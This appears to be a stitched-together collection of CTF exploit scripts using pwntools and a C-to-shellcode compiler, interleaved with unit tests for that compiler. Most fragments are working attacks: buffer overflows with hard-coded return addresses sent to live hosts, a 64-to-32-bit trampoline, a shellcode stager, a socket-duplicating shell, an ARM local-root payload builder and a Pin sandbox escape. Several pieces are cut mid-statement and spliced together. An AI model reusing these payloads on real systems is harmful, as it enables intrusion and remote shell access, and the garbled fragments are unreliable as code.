def test_test(self):
    """Smoke-test the x86 backend on a small C program.

    The program defines its own memset loop, zeroes a 4096-byte stack buffer
    twice and exits through the cshc-provided ``sys__exit``.  Only successful
    compilation is exercised; the produced bytes are discarded.
    """
    source = """ void *_memset(void *s, int c, size_t n) { unsigned char* p=s; while(n--) *p++ = (unsigned char)c; return s; } int main() { char buf[4096]; _memset(buf, 0, sizeof(buf)); _memset(buf, 0, sizeof(buf)); sys__exit(0); } """
    backend = cshc.arch("x86")
    backend.compile(source)
def _try(expr):
    """Send exploit.c with ``__EXPR__`` replaced by *expr* and return whether
    the server's marker reply took at least THRESHOLD seconds to arrive.

    ``remote``, ``time`` and ``THRESHOLD`` are module-level names that live
    outside this block.
    """
    r = remote("52.68.16.142", 10003 ,silent = True)
    # NOTE(review): the file object is never closed explicitly; a `with` block
    # would release the handle deterministically.
    tmpl = open("exploit.c").read()
    code = tmpl.replace("__EXPR__", expr)
    buf = cshc.arch("x86_64").compile(code)
    # Pad the payload with NUL bytes to exactly 8192 bytes.  If the compiled
    # output were ever longer than 8192 bytes the multiplier goes negative and
    # nothing is appended -- there is no length assertion here (cf. the other
    # scripts in this set).
    r.send(buf + "\0" * (8192 - len(buf)))
    t = time.time()
    b = r.recvuntil("Wow, It's beautiful!")  # value unused; only the elapsed time matters
    delay = time.time() - t
    # NOTE(review): not reached if recvuntil raises (timeout/EOF); the socket
    # would then leak.  A try/finally would close it on every path.
    r.close()
    return delay >= THRESHOLD
from pwn import *
import cshc

context("amd64", "linux")

# Assemble a two-stage payload and bake it into stage1.c as a C byte array.
shellcode = ""

# Stage 1: switch from 64-bit to 32-bit mode and execute stage2.c.  The far
# return (`retf`) pops the address of label `b` (rebased to 0x10000000) and
# the selector 0x23 pushed below it, so execution continues at `b` with the
# new code segment; ds/es are loaded with 0x2b and esp is moved beforehand.
# NOTE(review): the instruction line breaks inside the raw string were
# reconstructed from the collapsed original -- confirm against the source.
shellcode += flat(
    asm(r"""
a:
    mov esp, 0x1000fffc
    mov ax, 0x2b
    mov ds, ax
    mov es, ax
    sub esp, 8
    mov dword [esp+4], 0x23
    mov dword [esp], b - a + 0x10000000
    retf
b:
"""))
# Stage 2 follows immediately after the trampoline (x86, 32-bit).
shellcode += cshc.arch("x86").compile_file("stage2_sendflag.c")

# Emit stage1.c by substituting a `{b0,b1,...}` initializer for REPLACE_ME in
# the template.  `ord(val)` over the string assumes Python 2 (str is bytes);
# on Python 3 iterating bytes yields ints and ord() would fail.
# NOTE(review): neither file object is closed explicitly; the write relies on
# finalization to flush, so a `with` block would be safer.
open("stage1.c", "w").write(
    open("stage1_tmpl.c").read().replace(
        "REPLACE_ME",
        "{" + ",".join([str(ord(val)) for val in shellcode]) + "}"))
push 3 pop eax cdq inc edx shl edx, 12 push 4 ;sockfd pop ebx int 0x80 jmp ecx caller: call callee int3 """)) if len(buf) <= 128: buf += "C" * (129 - len(buf)) assert not "\0" in buf #raw_input(">") r.sendline("search " + buf) sc = cshc.arch("x86").compile_file("exploit2_heapspray.c") assert len(sc) <= 4096 r.send(sc) time.sleep(0.5) sc2 = shellcode.dupsh(m_sockfd) r.send(p32(len(sc2))) r.send(sc2) r.interactive()
#!/usr/bin/python from pwn import * import cshc context("amd64", "linux") r = remote("pinhole.pwn.seccon.jp", 10000) #r = remote("ctf", 4000) raw_input(">"); #sysenter buf = flat(asm("sub rsp, 64")); buf += cshc.arch("x86_64").compile(open("exploit.c", "r").read()) assert len(buf) <= 280 buf += "A" * (280 - len(buf)) buf += p64(0x4089e6) buf += "A" * (512 - len(buf)) r.send(buf) r.interactive()
from pack import *
import os
import cshc

# Build an ARM (little-endian) payload, embed it into template.c as a C byte
# initializer and cross-compile the result.  Python 2 script (`print` statement,
# str-as-bytes).
buf = ""
buf += "A" * (173 - len(buf))
# pl32 comes from the `pack` module; presumably packs a 32-bit little-endian
# value -- verify against that module.
buf += pl32(0x16370 + 173 + 4 + 1)
buf += "A"
buf += cshc.arch("armel").compile_file("root.c")
# Print the remaining headroom before enforcing the 480-byte limit.
print 480 - len(buf)
assert len(buf) <= 480
# Render the payload as "0x41, 0x42, ..." for substitution into the template.
buf_enc = ", ".join([hex(ord(ch)) for ch in buf])
# NOTE(review): /tmp/a.c is a fixed, predictable path in a world-writable
# directory (pre-existing file / symlink race); tempfile.NamedTemporaryFile or
# mkstemp would avoid that.  Both file objects are also left unclosed.
open("/tmp/a.c", "w").write(open("template.c").read().replace("__PAYLOAD__", buf_enc))
# Fixed command string with no user-controlled input, so shell interpolation
# is not a concern here; subprocess.run([...]) would still be the cleaner form.
os.system("arm-linux-gnueabi-gcc -o localroot /tmp/a.c")
pop ecx push 3 pop eax cdq inc edx shl edx, 12 push 4 ;sockfd pop ebx int 0x80 jmp ecx caller: call callee int3 """)) if len(buf) <= 128: buf += "C" * (129 - len(buf)) assert not "\0" in buf #raw_input(">") r.sendline("search " + buf) sc = cshc.arch("x86").compile_file("exploit2.c") assert len(sc) <= 4096 r.send(sc) time.sleep(0.5) sc2 = shellcode.dupsh(m_sockfd) r.send(sc2) r.interactive()
def test_aarch64(self):
    """Compile ``self.SRC`` for aarch64 and validate the result via check_shellcode."""
    target = "aarch64"
    compiled = cshc.arch(target).compile(self.SRC)
    self.check_shellcode(target, compiled)
def test_armel(self):
    """Compile ``self.SRC`` for armel and validate the result via check_shellcode."""
    target = "armel"
    compiled = cshc.arch(target).compile(self.SRC)
    self.check_shellcode(target, compiled)
def test_x86(self):
    """Compile ``self.SRC`` for x86 and validate the result via check_shellcode."""
    target = "x86"
    compiled = cshc.arch(target).compile(self.SRC)
    self.check_shellcode(target, compiled)
def test_aarch64(self):
    """Compile examples/test.c for aarch64 and validate the result via check_shellcode."""
    target = "aarch64"
    example = "examples/test.c"
    self.check_shellcode(target, cshc.arch(target).compile_file(example))
def test_armel(self):
    """Compile examples/test.c for armel and validate the result via check_shellcode."""
    target = "armel"
    example = "examples/test.c"
    self.check_shellcode(target, cshc.arch(target).compile_file(example))
def test_x86(self):
    """Compile examples/test.c for x86 and validate the result via check_shellcode."""
    target = "x86"
    example = "examples/test.c"
    self.check_shellcode(target, cshc.arch(target).compile_file(example))
#!/usr/bin/python
from pwn import *
import cshc

context("amd64", "linux")

# Connect, echo the banner line, then send the compiled pindestroy.c payload
# and print everything the service returns.  Python 2 script (`print` statement).
r = remote("188.40.18.84", 1234)
print r.recvline()
# Earlier variants (kept for reference) sent a file-dump payload instead.
#sc = flat(shellcode.cat("/proc/self/maps"))
#sc = flat(shellcode.cat("/home/user/pin/source/tools/31C3_pin_escape/obj-intel64/31C3_pin_escape.so"))
sc = cshc.arch("x86_64").compile_file("pindestroy.c")
# Append eight x86 NOP (0x90) bytes after the compiled code.
sc += "\x90" * 8
# Show the used/allowed size before enforcing the 4086-byte limit.
print len(sc), "/", 4086
assert len(sc) <= 4086
r.send(sc)
print r.recvall()
assert not "\n" in buf assert len(buf) <= 256 r.sendline(buf) #execute shellcode shellcode = inputadr + 0x40 buf = "" buf += "A" * 0x38 buf += p64(shellcode) # stager buf += flat(asm(r""" _start: xor edi, edi mov edx, 8192 sub rsp, rdx mov rsi, rsp xor eax, eax syscall jmp rsi """)) assert not "\n" in buf assert len(buf) <= 256 r.sendline(buf) r.recvuntil("Login: Password: "******"x86_64").compile(open("exploit.c", "r").read().replace("LIBC_BASE", str(libc_base))) assert len(shellcode) <= 8192 r.send(shellcode) r.interactive()